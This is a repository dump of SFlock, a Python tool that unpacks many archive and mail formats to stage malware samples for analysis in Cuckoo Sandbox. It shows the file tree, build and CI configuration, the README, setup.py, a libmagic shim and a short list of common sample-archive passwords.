├── .gitignore
├── .travis.yml
├── MANIFEST.in
├── README.md
├── appveyor.yml
├── docs
    └── LICENSE
├── setup.py
├── sflock
    ├── __init__.py
    ├── abstracts.py
    ├── compat
    │   ├── __init__.py
    │   └── magic.py
    ├── config.py
    ├── data
    │   ├── __init__.py
    │   ├── password.txt
    │   ├── poweriso.elf
    │   ├── win32
    │   │   ├── magic.mgc
    │   │   ├── magic1.dll
    │   │   ├── regex2.dll
    │   │   └── zlib1.dll
    │   ├── win64
    │   │   ├── libgnurx-0.dll
    │   │   ├── magic.mgc
    │   │   └── magic1.dll
    │   └── zipjail.elf
    ├── decode
    │   ├── __init__.py
    │   └── office.py
    ├── deps.md
    ├── errors.py
    ├── exception.py
    ├── ident.py
    ├── identify.py
    ├── main.py
    ├── misc.py
    └── unpack
    │   ├── __init__.py
    │   ├── ace.py
    │   ├── bup.py
    │   ├── cab.py
    │   ├── daa.py
    │   ├── eml.py
    │   ├── msg.py
    │   ├── mso.py
    │   ├── office.py
    │   ├── pdf.py
    │   ├── rar.py
    │   ├── tar.py
    │   ├── zip.py
    │   └── zip7.py
└── tests
    ├── files
        ├── 1.iqy
        ├── 1.slk
        ├── 1.url
        ├── 1025mb.7z
        ├── 1025mb.tar.bz2
        ├── 1025mb.zip
        ├── 7z_encrypted.7z
        ├── 7z_garbage.7z
        ├── 7z_nested.7z
        ├── 7z_nested2.7z
        ├── 7z_plain.7z
        ├── QWERT
        ├── ZIP_PLAIN.ZIP
        ├── ace_doubledot.ace
        ├── ace_nested.ace
        ├── ace_nested2.ace
        ├── ace_plain.ace
        ├── bup_test.bup
        ├── busybox-i686
        ├── bypass_minimized.pdf
        ├── cab2.cab
        ├── doc_1.docx_
        ├── doc_2.xlsx_
        ├── edge
        │   └── data11.zip
        ├── eml_faulty.eml_
        ├── eml_nested_eml.eml
        ├── eml_tar_nested2.eml
        ├── encrypted1.docx
        ├── extension
        │   ├── .gitignore
        │   ├── 7z
        │   │   └── a513501f853c2878aa8b17dd6e0e30cb0593c99a8b7be562c69e80c3dd90c6de
        │   ├── ace
        │   │   ├── 2ba7830bf2779e062f5d96a620317803eb3a989db9ee806309863bb215165036
        │   │   └── 6419b78338f872d4ae9e1d3743da4f22a1a1bd27f2c06882cacbb6eb60f2c8d8
        │   ├── apk
        │   │   └── 39552b93da148109983f724f7c98317cfea83d003493b161f735972507e84d24
        │   ├── bat
        │   │   ├── 6ac2ab4b6cc96a8f5e5ff08d825c7ac14504878061607530f58f7a1b02c0bfac
        │   │   └── b11243ac75e5c3e343615889dbe28e51b1795dc5628e0f12e03b7192ca61bc60
        │   ├── cab
        │   │   ├── 9d55a648b54b9c5e183288cbab7fda2ed6c3d95a517618fc75b51e2161a34a6f
        │   │   └── ea0c12aedea644678014991a96534145e85aa12cd8955396dfdc98a4fc96f0d5
        │   ├── daa
        │   │   └── 7ad92100104fb0124d1cc2be7282825e93ec9d38e4ed49524032bcae6c68e7d8
        │   ├── dll
        │   │   ├── .gitkeep
        │   │   ├── 2438653076155b6074ffe0fbb23cb50377d62444084b80a4352b7bc5642c645d
        │   │   ├── 3785f0e3b40e91ea768c04153253cde6f91c3370c6a532e398f3c058eef50ab6
        │   │   └── f1368be659aa55e697c0727bb91cd5e213d277ebc4c5f1b055611ec715245998
        │   ├── doc
        │   │   ├── .gitkeep
        │   │   ├── a902866c7635c2ad4f8553c4dcec86ac641775a6e3f34d21e8c7d1b520bb39d2
        │   │   └── fbb56d641f10252b76c478aae580a013f219e00f91042470f285fd0d3d3465aa
        │   ├── docm
        │   │   ├── 7efd0060413eb3c0ceef8a2f5016365fb906e70f2373c06e84a83c2b75465969
        │   │   └── ff044ff576a0e952efc0532a9067cf624a0c3c2bdd03d390fea84153f0bf560c
        │   ├── docx
        │   │   ├── .gitkeep
        │   │   ├── 8cef4a33b0394771a06168d5e9d2003ed45032f79189cce6d0a84bb9d03fbce7
        │   │   └── b6b37030a11e62c05f2219f211d83d6d7caeb4b1edb65cf9ef81ff01cf46d6e3
        │   ├── dotm
        │   │   └── 62a894e856377a7ae5a4e439e4fc05dfc6f50357f1a69c06726b3b9aa4bf0a3b
        │   ├── dotx
        │   │   ├── 12d9f7369a0952f2b46f7a410b2907d85dc95517091cb823ca1799ed2e5b96fe
        │   │   └── e52085d3545564246fb15a01134f1f8abe8bb3eef3ca6b90f1e3179fea138470
        │   ├── elf
        │   │   ├── 0d06f9724af41b13cdacea133530b9129a48450230feef9632d53d5bbb837c8c
        │   │   ├── 1ec814defeca65d1ce9834eb1edd1af37b28bcc1ca0facf747d50b128e336e07
        │   │   ├── busybox-i686
        │   │   └── ls
        │   ├── eml
        │   │   ├── 0c4a1d51e8f2ca75afaeb506bfec85e2b6195bcfe617081659bf1b758f05a953
        │   │   └── 78df974998868d10682fc3693bdfbbd61337923805b360394fae5e8371063f69
        │   ├── exe
        │   │   ├── .gitkeep
        │   │   ├── 067bd7d1457f9bcb0545ce33dacb8edaa0d130f0b9ab3eb6e7c6cc36cf97edc9
        │   │   ├── b3b4c065849c81d856558e9cf91e8cef5d481648fd8aa88cdda534ab6b75e988
        │   │   └── c61c86a4f785e8838537c84613198a6e93737c0c9ab2ccd84a2be6c04ac0c5d5
        │   ├── hta
        │   │   ├── 54a8c81a98f122fb67232ff7254f1ce09a701c2d101490bf0ec442be0da48e1f
        │   │   └── ca2ad785528c4f41bbc8dd5c261c5aa37d3de6ce1708f9e7b2c78d006d39882f
        │   ├── html
        │   │   ├── .gitkeep
        │   │   ├── 4d06fb8eb1130b3936691122a8252f1d2e5250d0fa24f239f2dcf2704d7064f6
        │   │   ├── c34e59d3987e0d5413d843a3e3556f9de250bb79968406a3aab78e62783aa18d
        │   │   └── ea2feebdffe91ce6e5a1b429c6cce29f43771a2722ab3d391cd031ed9c2f8f95
        │   ├── hwp
        │   │   ├── .gitkeep
        │   │   ├── 0d56c5f20b2da3659f05d613d3faeb41d9e82a45e9161c3b48805ebb7b2730b9
        │   │   └── cfc47838f03f5054ae47c5b1de27883b312d0cb14ee543b772e43fcc0b460c9f
        │   ├── iqy
        │   │   └── 22b97953b1cf40b461d8e8df62e0b6e31a44986a2dd1a62d8529ae68b4d82edd
        │   ├── iso
        │   │   ├── 9c13659b6440cc24133fc3b89696921839f5197e18ac2edd04fa605edb026bcf
        │   │   ├── adc63e6114f6fc3c90f48edf7602812fd3191dbfd8263d90ba9166d3409619ec
        │   │   └── f303cdea6a123ce4501449936c7c809f855a2d32d3d17cc2630390df2f588d07
        │   ├── jar
        │   │   ├── .gitkeep
        │   │   ├── 53bcd9a9ca4f93bc7de61a3458f2c2ed95745ad1341d491bf03939b00504fcf2
        │   │   └── 8dfc59f75cb74edfefbb77caf5b383cd2143b04469ee6c5ee9bbd0fde2363271
        │   ├── js
        │   │   ├── .gitkeep
        │   │   ├── 474b7f305055ff40e7d644828c8bb5b3b19bdc17a8a6054c88ce7489a80314f3
        │   │   ├── a3e41fa2fe47067bd545c98a4283abe58880cb2d17457c1aa6b00bee2b3d7188
        │   │   └── f7212b1bd28730f9c46404311de6786e135bb01961acdde23664a759b83ebb42
        │   ├── lnk
        │   │   ├── 062e1b2d15530911ed0d9bd09f072c788acbfcadaeb84e346eadba2921b6827c
        │   │   ├── 0c26f76c3816a52fbd90de0bf0892c9472a5f056e4ed9793b8b68fd11033adba
        │   │   ├── 15d0bcf0af2c27743ba1b7d219fe20c12a4e21b561acfe8cce2261b8b2beadbb
        │   │   ├── 23497bfd1d2abc332f94fbfb26aa20fd0a7106bc41635763c213cb1f35fa7084
        │   │   ├── 26d0ac7627f7fe3e417516e0e1b695b82cd83a6d95fc988481672ab9f2fb0f7b
        │   │   ├── 2fbf9d271dd942ff3d1b6e171503b1e9907296a02a7a6efb238ce83774fe8192
        │   │   ├── 30fdbbf58cc153d1507b088a299d37bd8f70433accea9003b7a5ef72606153f9
        │   │   ├── 3b4ec70681e528663dee39c5c6ebceec2b7ddf09707a78df20cae3b7b807fac5
        │   │   ├── 59d2882c4e2380f4e06a5ded77f70c81d55fa209a0239a2ef851b938634b424a
        │   │   ├── 629b0c9dd99386fd786edb8c3af0a6ccf8d948ae83f936c6991b439a5da08b6e
        │   │   ├── 677505fd0b5e420613215ed6d89f3e011adc06b02751603e8fae439086d27000
        │   │   ├── 8f4bc2518baa580ca3aec191fb2fbe7ec087b6b6bc722e54abe3249ed85c9e4b
        │   │   ├── b8ece555ef8ccfb558efdac4cd3496c1ba365cfeea96506e094e5744a8470c8f
        │   │   ├── d5ae39e8e3116bf0a5e0006b238ed5043b41f10e1d681f4266ac8a7974dbd879
        │   │   ├── dae5a67843f02bdeaadc71f28e321d7d94edc9a0d8d5a7fd0ee6250a9d47aeab
        │   │   ├── db140c1c811d21763a78f6db66ed3df8bb1f95bd6bcf1f2e917dcdcd6f6241fc
        │   │   ├── ec2e2e5f27620cb113f52ad4a5d28b5d249ca80ba6de323c91b90bd57c54279c
        │   │   └── ee2d8c153e44bb6a7ecacc3ba68b5bafc8e82972d2d1a1c7c49a0413ed684ddf
        │   ├── mht
        │   │   ├── 6dabcf29acfdbab8c58ad44d149be7038f4ae0b0b3fec946b3fb7c0ea7164525
        │   │   └── cfe00220572e5bdbdbe30190193972779227f23fb18f402bad71c7471f22b08f
        │   ├── msg
        │   │   ├── 002268de5c7110e8ca332bce3c9863af3ebba5ed1fe77e8ef36ae9dfd2015f1b
        │   │   ├── 56823b8d575798740da121c88d5c6e4b719f7929d6aa389ab204ad106abf53b7
        │   │   ├── 94f137d8c1f1e3e8dc40d186bcacc0ac2731177364b7e9ee17a3f374fae65948
        │   │   └── a79b7fd34907c49c0808bee82f29705cb97619f1c473377ba56d385909a48f16
        │   ├── msi
        │   │   ├── .gitkeep
        │   │   ├── 5aa41c7e3160dca492317182e2cf5ad947e91457b5d4a39fc5d7aabcc0c9dd8c
        │   │   └── 82cf474020d187ed9f4528387a80e81120c3910ae43abc2d9aa486d7d53c5677
        │   ├── ods
        │   │   ├── .gitkeep
        │   │   └── e5fc9b97898531de8ea88a10df824a895ba3c9c31c9aeb8359025c36949a3aee
        │   ├── odt
        │   │   ├── .gitkeep
        │   │   └── cf0f76e068915d2bf069e78b9cb2083db37fbd85747f9648f7bf3bfda57b8e2a
        │   ├── pdf
        │   │   ├── .gitkeep
        │   │   ├── a9e5ae4c3a25c578fb5b1ace4227ecc3b3ae4436acf4103a9d4bcdc1cf93a92b
        │   │   ├── ab659b26577b6ba70e67b3fa3f18714639894ff2190ede5fc0adb3fd1fd24a66
        │   │   └── fff0587b2c63cbe23387f03c45a485a88052fd78410edbb2c17482be9a1fdbeb
        │   ├── ppsm
        │   │   └── 15d976d97fd6489165bf574a3170fa72f0462eb31ed9fb21633e4c7bb80f35c4
        │   ├── ppsx
        │   │   ├── 02f1f646b1204c07eb900566a90d8edd4c0f9ebd559bfb9ec2484e885ba58f83
        │   │   ├── 0ece537f3f6de0076ac5eb565629177c33b9c1318bb41279993970401018d5bc
        │   │   └── 33a200ee9823322bf4abcd6a3747485c3926a0f8aef8318f0c685396976d9d16
        │   ├── ppt
        │   │   ├── .gitkeep
        │   │   ├── 698a95e8fb79943bad9f5450ddc31d979aa9ce702eae9a5f40ff3fd24c6707cf
        │   │   └── c106a0d1bea84d713316a3bb1fd8ed3f8ac2316ad02aba0893d8734963f76cb9
        │   ├── pptm
        │   │   ├── 16eacaeb506a74cb3fcef8578c6c256b263ac6e3fdcf481f73d52ad39eccb698
        │   │   └── 216cb6e868960187c63a700ee6018297e7bbf1af8dab778ec452d6b15546300f
        │   ├── pptx
        │   │   ├── .gitkeep
        │   │   ├── a8119bd3a9fe8245db24a512105d6f3309cd858b7c7c82de1e6ebaa43f857a87
        │   │   └── c2b8d3d8ca5ffb9fcc540c711ce89fcb1115bc7f610843f6ae5d0a9ec773220a
        │   ├── ps1
        │   │   ├── 0f1e223eaf8b6d71f65960f8b9e14c98ba62e585334a6349bcd02216f4415868
        │   │   └── 1e2485d575260b927edb183402fcb36b2226f8ea0158a2da71df4aab70364db0
        │   ├── py
        │   │   ├── .gitkeep
        │   │   ├── ad945f8dbefc45721335130049b9ddcbb50a3e1fde045eb5a825250b1433880b
        │   │   └── d11eff9047b71b82adce6089c3a845263846b124108b4b48220c3142393e89ad
        │   ├── rar
        │   │   ├── .gitkeep
        │   │   ├── b11694e84acf5025d9ab27093089d55af000ceb1f823f6c4767281e013cac505
        │   │   └── cbe6d7395541c3593f4e7c87bbadf5eaf1c71d33be69db46322381fc914ef4e8
        │   ├── rtf
        │   │   ├── .gitkeep
        │   │   ├── 492164a007b59fa3e9a8b56b28f2492852fc961e1034def7b60f45724b501827
        │   │   ├── 6ce7a7ab3c3cfbe7c29a91e93f2de94ab4fd21b9d42c3382a19234c42de90e3e
        │   │   └── f1ae6a4da793286cca946fd8ec5ce0f00ecdcb6b6264d7344a48300f750311f0
        │   ├── slk
        │   │   ├── 04a24329e577b82f1583e10008cb307603f71e269a4ff089519715b64a12486d
        │   │   └── a185174e76d43ca8f27f1b47b38e4ff0e5cd32899b29f3c7bf9e93c3d23e8bd3
        │   ├── txt
        │   │   └── 605dcc80afc6889149751b196a2477c58a77a80a8dcbe14782b34e735b65728d
        │   ├── url
        │   │   └── 40e1c541406fd6d252810cbca40562ba3c3355064607dddc174fc8ab77fa8546
        │   ├── vbs
        │   │   ├── 8cea5e1f59cc336a5b13929e3a0f41c8a84434cb1d9237e8320bc0f29f3a2c4e
        │   │   ├── a0f80af23c1b1dc0ade98bd3108f55b7c82a86e7b6b768d9ee39053b6c486aaf
        │   │   └── d2ecf409ea91e2b424c955a35db3e439e86de1a79164ba1303beaca5a8cb780c
        │   ├── wsf
        │   │   ├── .gitkeep
        │   │   ├── 250c42b5442738d19494dac851ec40512eac58941e0bfa9e9efd726183a97851
        │   │   ├── 84c88c3462ce8586c3123bbf0eb330e7ede6cc334ca29eccfd593ac54a612f89
        │   │   ├── ec865aaf77111bf9d0e17b5f9ccca0628885b271ccceb2956735a6c4eff27252
        │   │   └── script1
        │   ├── xlam
        │   │   ├── 123fc08718d27577a6f0ffdd34439ca6c909b7a0c0bced115213435518c9cf07
        │   │   └── c542f45cec9034b00be5a64cae75193d7816c58e5df889cbc638b991f7da0c9f
        │   ├── xls
        │   │   ├── .gitkeep
        │   │   ├── 29f9eefd8c3e34681533ff636bd314990929d623024d2322b94f8e0b76428163
        │   │   └── bc1d04bcb1139378660aa23c9bf29866d29860fe7f3643fa28e017bdd5f60d55
        │   ├── xlsb
        │   │   ├── 377888b75eaf66d508d728629a6dc758bb7fbebc1a265dc4c3be6ba24c67e7da
        │   │   └── 875a8476e3a6f11afeeee9bd613f9e81aa79a61a64b6c1c581e00b7e13ea4f63
        │   ├── xlsm
        │   │   ├── 09a7b755ef951bf7340990068b5331de9e0496c23c62785f54a154b5869bcc31
        │   │   └── 7b499302662fd5ef60aca03067618ca1ffb82ba1e60ebe888fa6fa0eac948118
        │   └── xlsx
        │   │   ├── .gitkeep
        │   │   ├── 5d7bde4d4d96427d47f2267017020a567ee650184ca8913766eab75bf3630bc3
        │   │   └── ff9d094be8cfc1a131e8d8fb714f27287057c6de64d19a5ac752715f52b24d64
        ├── garbage.bin
        ├── gzip1.gzip
        ├── gzip_noext
        ├── invld.elf_
        ├── iso_udf_noext
        ├── iso_udf_nomagic_noext
        ├── lnk_1.lnk
        ├── maldoc.xls
        ├── maldoc
        │   ├── 118368
        │   └── 0882c8
        ├── maldoc_office.htm
        ├── msg_doc.msg_
        ├── msg_invoice.msg
        ├── msg_rtf.msg_
        ├── ole_nullbyte.zip
        ├── oledata.mso
        ├── oledoc1.doc_
        ├── partial.zip
        ├── payment.iso
        ├── pdf_docm.pdf
        ├── pptx_1.pptx
        ├── quota.daa
        ├── randomfile.lha
        ├── rar_garbage.rar
        ├── rar_nested.rar
        ├── rar_nested2.rar
        ├── rar_plain.rar
        ├── readelf.cab
        ├── sample.apk
        ├── sample.jar
        ├── script.js
        ├── script.ps1
        ├── script.vbs
        ├── script.wsf
        ├── sflock.rar
        ├── sflock2.rar
        ├── sflock_encrypted.rar
        ├── sflock_encrypted2.rar
        ├── symlink.rar
        ├── tar_garbage.tar
        ├── tar_nested.tar
        ├── tar_nested.tar.bz2
        ├── tar_nested.tar.gz
        ├── tar_nested2.tar
        ├── tar_noext
        ├── tar_plain.tar
        ├── tar_plain2.tar
        ├── tar_plain2.tar.bz2
        ├── tar_plain2.tar.gz
        ├── tarbz2_noext
        ├── targz_no_ext
        ├── test.hta_
        ├── test.lzh
        ├── xlsx_encoded.xlsx
        ├── zip_encrypted.zip
        ├── zip_encrypted2.zip
        ├── zip_garbage.zip
        ├── zip_nested.zip
        ├── zip_nested2.zip
        └── zip_plain.zip
    ├── test_7z.py
    ├── test_ace.py
    ├── test_attr.py
    ├── test_bup.py
    ├── test_cab.py
    ├── test_daa.py
    ├── test_decode.py
    ├── test_elf.py
    ├── test_eml.py
    ├── test_exts.py
    ├── test_file.py
    ├── test_ident.py
    ├── test_identify.py
    ├── test_lzh.py
    ├── test_magic.py
    ├── test_main.py
    ├── test_misc.py
    ├── test_msg.py
    ├── test_mso.py
    ├── test_office.py
    ├── test_pdf.py
    ├── test_rar.py
    ├── test_tar.py
    ├── test_unpack.py
    ├── test_zip.py
    └── test_zipify.py


/.gitignore:
--------------------------------------------------------------------------------
 1 | *.a
 2 | *.o
 3 | *.dll
 4 | *.exe
 5 | *.so
 6 | *.pyc
 7 | *.pyo
 8 | 
 9 | .coverage
10 | .eggs/
11 | .idea/
12 | .vscode/
13 | .pytest_cache/
14 | SFlock.egg-info/
15 | dist/
16 | venv/


--------------------------------------------------------------------------------
/.travis.yml:
--------------------------------------------------------------------------------
 1 | language: python
 2 | dist: bionic
 3 | 
 4 | matrix:
 5 |   fast_finish: true
 6 |   include:
 7 |     - python: 3.6
 8 |     - python: 3.7
 9 |     - python: 3.8
10 |     #- os: osx
11 |     #  language: generic
12 | 
13 | #before_install:
14 | #  - |
15 | #    if [[ $TRAVIS_OS_NAME == "osx" ]]; then
16 | #      brew update || brew update
17 | #      brew install libmagic
18 | #      # The following wasn't required in the past and therefore may become
19 | #      # obsolete once again in the future. Let's wait and see.
20 | #      wget https://bootstrap.pypa.io/get-pip.py
21 | #      sudo python get-pip.py
22 | #      sudo pip install virtualenv
23 | #      virtualenv $HOME
24 | #      source $HOME/bin/activate
25 | #    fi
26 | 
27 | install:
28 |   - pip install -e .
29 |   - pip install --upgrade pytest pytest-cov codecov coveralls mock
30 | 
31 | script:
32 |   - '[[ $TRAVIS_OS_NAME == "linux" ]] && sudo apt update'
33 |   - '[[ $TRAVIS_OS_NAME == "linux" ]] && sudo apt -y install p7zip-full rar unace-nonfree cabextract'
34 |   - 'pytest --cov=sflock --cov-append'
35 | 
36 |   - python -c 'import sflock, sys ; assert "pkg_resources" not in sys.modules'
37 | 
38 | after_success:
39 |   - codecov
40 |   - coveralls
41 | 


--------------------------------------------------------------------------------
/MANIFEST.in:
--------------------------------------------------------------------------------
 1 | graft sflock
 2 | recursive-exclude * *.pyc *.pyo
 3 | include sflock/data/password.txt
 4 | include sflock/data/win32/magic1.dll
 5 | include sflock/data/win32/magic.mgc
 6 | include sflock/data/win32/regex2.dll
 7 | include sflock/data/win32/zlib1.dll
 8 | include sflock/data/win64/libgnurx-0.dll
 9 | include sflock/data/win64/magic1.dll
10 | include sflock/data/win64/magic.mgc
11 | include sflock/data/zipjail.elf
12 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
  1 | # sflock
  2 | 
  3 | [![Build Status](https://travis-ci.org/jbremer/sflock.svg?branch=master)](https://travis-ci.org/jbremer/sflock)
  4 | [![Windows Build Status](https://ci.appveyor.com/api/projects/status/32r7s2skrgm9ubva?svg=true)](https://ci.appveyor.com/project/jbremer/sflock)
  5 | [![Coverage Status](https://coveralls.io/repos/github/jbremer/sflock/badge.svg?branch=master)](https://coveralls.io/github/jbremer/sflock?branch=master)
  6 | [![codecov](https://codecov.io/gh/jbremer/sflock/branch/master/graph/badge.svg)](https://codecov.io/gh/jbremer/sflock)
  7 | 
  8 | Sample staging & detonation utility to be used as unpacking engine for
  9 | other analysis tools. Since version 0.3 sflock is compatible with both Python
 10 | 2 and Python 3 (to be precise, Python 2.7, 3.5, and 3.6).
 11 | 
 12 | Birds tend to move around in flocks, therefore the sflock utility can digest a
 13 | flock of samples, but also inverse flocks, i.e., sflock unpacks various
 14 | archive file formats to extract embedded samples.
 15 | 
 16 | Simply put, sflock provides a staging area where binary data is investigated
 17 | and split into one or more files to be analyzed further by other tools. In
 18 | particular sflock focuses on integration and usage with Cuckoo Sandbox.
 19 | 
 20 | Installation
 21 | ============
 22 | 
 23 | As-is sflock has been designed to be used to its full extent on
 24 | Ubuntu/Debian-like systems. For optimal usage it is recommended to install the
 25 | following packages alongside sflock. It is currently not possible to run the
 26 | unpackers that require native tooling support on non-Linux platforms.
 27 | 
 28 | ```bash
 29 | $ sudo apt-get install p7zip-full rar unace-nonfree cabextract
 30 | ```
 31 | 
 32 | Installation of sflock itself may be done as follows.
 33 | 
 34 | ```bash
 35 | $ sudo pip install -U sflock
 36 | ```
 37 | 
 38 | Or in a virtualenv environment.
 39 | 
 40 | ```bash
 41 | (venv)$ pip install -U sflock
 42 | ```
 43 | 
 44 | Installation (Windows)
 45 | ======================
 46 | 
 47 | Since version 0.2 sflock properly supports Windows-based operating systems.
 48 | 
 49 | To avoid difficult setup instructions, sflock ships the required 32-bit and
 50 | 64-bit binaries to use libmagic under Windows such that it works flawlessly.
 51 | 
 52 | Note: on Windows the `7z`, `ace`, `cab`, `daa`, `gzip`, `iso`, `lzh`, and
 53 | `rar` file formats are not supported.
 54 | 
 55 | Installation (macOS)
 56 | =======================
 57 | 
 58 | Since version 0.2 sflock properly supports macOS-based operating systems.
 59 | One does have to manually install `libmagic` though. This may be done through
 60 | the `brew` package manager.
 61 | 
 62 | ```bash
 63 | $ brew update
 64 | $ brew install libmagic
 65 | ```
 66 | 
 67 | Note: on macOS the `7z`, `ace`, `cab`, `daa`, `gzip`, `iso`, `lzh`, and `rar`
 68 | file formats are not supported.
 69 | 
 70 | Supported archives
 71 | ==================
 72 | 
 73 | SFlock supports a number of (semi-)archive types, sorted by extension:
 74 | 
 75 | * .7z (7-Zip archive, `requires native tooling`)
 76 | * .ace (ACE archive, `requires native tooling`)
 77 | * .bup (McAfee quarantine files)
 78 | * .cab (Microsoft Cabinet archive, `requires native tooling`)
 79 | * .daa (PowerISO, `requires included Linux native tooling`)
 80 | * .eml (MIME RFC 822 email representation)
 81 | * .gzip (gzip compressed data, `requires native tooling`)
 82 | * .iso (ISO file container, `requires native tooling`)
 83 | * .lzh (LZH/LHA archive, `requires native tooling`)
 84 | * .msg (Outlook mail message)
 85 | * .mso (Microsoft Office Macro reference file)
 86 | * .pdf (Attachments embedded in PDF files)
 87 | * .rar (RAR archive, `requires native tooling`)
 88 | * .tar (Unix file archive)
 89 | * .tar.bz2 (bzip2 compressed Unix file archive)
 90 | * .tar.gz (gzip compressed Unix file archive)
 91 | * .zip (ZIP archive)
 92 | 
 93 | Security
 94 | ========
 95 | 
 96 | Due to its nature of unpacking malicious archives with, depending on the
 97 | extension, native tools (i.e., *.7z*, *.ace*, *.cab*, *.daa*, *.gzip*, *.iso*,
 98 | *.lzh*, and *.rar*), it is important that such operations happen securely.
 99 | SFlock therefore wraps execution of the native tools in [zipjail][], a
100 | usermode sandbox written exactly for this purpose.
101 | 
102 | [zipjail]: https://github.com/jbremer/tracy/tree/master/src/zipjail
103 | 


--------------------------------------------------------------------------------
/appveyor.yml:
--------------------------------------------------------------------------------
 1 | environment:
 2 |   matrix:
 3 |     - PYTHON: "C:/Python27"
 4 |     - PYTHON: "C:/Python27-x64"
 5 | 
 6 | install:
 7 |   - "%PYTHON%/Scripts/pip.exe install -e ."
 8 |   - "%PYTHON%/Scripts/pip.exe install pytest pytest-cov codecov mock"
 9 | 
10 | build: false
11 | 
12 | test_script:
13 |   - '%PYTHON%/Python.exe -c "import sflock ; exit(len(sflock.supported()) != 9)"'
14 |   - '%PYTHON%/Scripts/pytest.exe --cov=sflock'
15 | 
16 | after_test:
17 |   - "%PYTHON%/Scripts/codecov.exe"
18 | 


--------------------------------------------------------------------------------
/setup.py:
--------------------------------------------------------------------------------
 1 | # Copyright (C) 2015-2018 Jurriaan Bremer.
 2 | # Copyright (C) 2018-2019 Hatching B.V.
 3 | # This file is part of SFlock - http://www.sflock.org/.
 4 | # See the file 'docs/LICENSE.txt' for copying permission.
 5 | 
 6 | from setuptools import setup
 7 | 
 8 | setup(
 9 |     name="SFlock",
10 |     version="1.0",
11 |     author="Hatching B.V.",
12 |     author_email="jbr@hatching.io",
13 |     packages=[
14 |         "sflock",
15 |         "sflock.unpack",
16 |         "sflock.data",
17 |     ],
18 |     entry_points={
19 |         "console_scripts": [
20 |             "sflock = sflock.main:main",
21 |         ],
22 |     },
23 |     url="http://sflock.org/",
24 |     license="GPLv3",
25 |     description="Sample staging and detonation utility",
26 |     include_package_data=True,
27 |     python_requires='>3.6',
28 |     install_requires=[
29 |         "click==7.0",
30 |         "cryptography>=3.2,<3.3",
31 |         "olefile>=0.43,<0.50",
32 |         "peepdf>=0.4.1,<0.5",
33 |         "python-magic>=0.4,<0.5",
34 |     ],
35 |     extras_require={
36 |         'test': ['pytest', 'mock']
37 |     }
38 | )
39 | 


--------------------------------------------------------------------------------
/sflock/__init__.py:
--------------------------------------------------------------------------------
1 | # Copyright (C) 2015-2018 Jurriaan Bremer.
2 | # This file is part of SFlock - http://www.sflock.org/.
3 | # See the file 'docs/LICENSE.txt' for copying permission.
4 | 
5 | from sflock.compat import magic
6 | from sflock.exception import UnpackException
7 | from sflock.main import ident, unpack, supported, zipify
8 | 


--------------------------------------------------------------------------------
/sflock/compat/__init__.py:
--------------------------------------------------------------------------------
1 | # Copyright (C) 2016 Jurriaan Bremer.
2 | # This file is part of SFlock - http://www.sflock.org/.
3 | # See the file 'docs/LICENSE.txt' for copying permission.
4 | 


--------------------------------------------------------------------------------
/sflock/compat/magic.py:
--------------------------------------------------------------------------------
 1 | # Copyright (C) 2016-2018 Jurriaan Bremer.
 2 | # Copyright (C) 2018 Hatching B.V.
 3 | # This file is part of SFlock - http://www.sflock.org/.
 4 | # See the file 'docs/LICENSE.txt' for copying permission.
 5 | 
 6 | from __future__ import absolute_import
 7 | 
 8 | import logging
 9 | import os
10 | import sys
11 | 
12 | from sflock.misc import data_file
13 | 
14 | log = logging.getLogger(__name__)
15 | 
16 | # Provide libmagic support in terms of binaries under Windows.
17 | if sys.platform == "win32":
18 |     if sys.maxsize != 0x7fffffff:
19 |         os.environ["PATH"] = "%s;%s" % (
20 |             data_file("win64"), os.environ["PATH"]
21 |         )
22 |         magic_file = data_file("win64", "magic.mgc")
23 |     else:
24 |         os.environ["PATH"] = "%s;%s" % (
25 |             data_file("win32"), os.environ["PATH"]
26 |         )
27 |         magic_file = data_file("win32", "magic.mgc")
28 | 
29 | # Therefore only import libmagic at this point.
30 | import magic
31 | 
32 | if sys.platform == "win32":
33 |     magic._instances[False] = magic.Magic(mime=False, magic_file=magic_file)
34 |     magic._instances[True] = magic.Magic(mime=True, magic_file=magic_file)
35 | 
36 | def from_file(f, mime=False):
37 |     try:
38 |         return magic.from_file(f, mime)
39 |     except magic.MagicException as e:
40 |         return e.message
41 | 
42 | def from_buffer(buf, mime=False):
43 |     try:
44 |         return magic.from_buffer(buf, mime)
45 |     except magic.MagicException as e:
46 |         return e.message
47 | 


--------------------------------------------------------------------------------
/sflock/config.py:
--------------------------------------------------------------------------------
 1 | # Copyright (C) 2015-2018 Jurriaan Bremer.
 2 | # Copyright (C) 2018 Hatching B.V.
 3 | # This file is part of SFlock - http://www.sflock.org/.
 4 | # See the file 'docs/LICENSE.txt' for copying permission.
 5 | 
 6 | # By default we don't accept a collection of files to be larger than 1GB.
 7 | # May be tweaked in the future including modifying this at runtime.
 8 | MAX_TOTAL_SIZE = 1024 * 1024 * 1024
 9 | 
10 | def iter_passwords():
11 |     import pkg_resources
12 |     filepath = pkg_resources.resource_filename("sflock", "data/password.txt")
13 |     for line in open(filepath, "r"):
14 |         yield line.strip()
15 | 


--------------------------------------------------------------------------------
/sflock/data/__init__.py:
--------------------------------------------------------------------------------
1 | # Copyright (C) 2015-2016 Jurriaan Bremer.
2 | # This file is part of SFlock - http://www.sflock.org/.
3 | # See the file 'docs/LICENSE.txt' for copying permission.
4 | 


--------------------------------------------------------------------------------
/sflock/data/password.txt:
--------------------------------------------------------------------------------
1 | infected
2 | malware
3 | password
4 | virus


--------------------------------------------------------------------------------
/sflock/data/poweriso.elf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/sflock/data/poweriso.elf


--------------------------------------------------------------------------------
/sflock/data/win32/magic.mgc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/sflock/data/win32/magic.mgc


--------------------------------------------------------------------------------
/sflock/data/win32/magic1.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/sflock/data/win32/magic1.dll


--------------------------------------------------------------------------------
/sflock/data/win32/regex2.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/sflock/data/win32/regex2.dll


--------------------------------------------------------------------------------
/sflock/data/win32/zlib1.dll:
--------------------------------------------------------------------------------
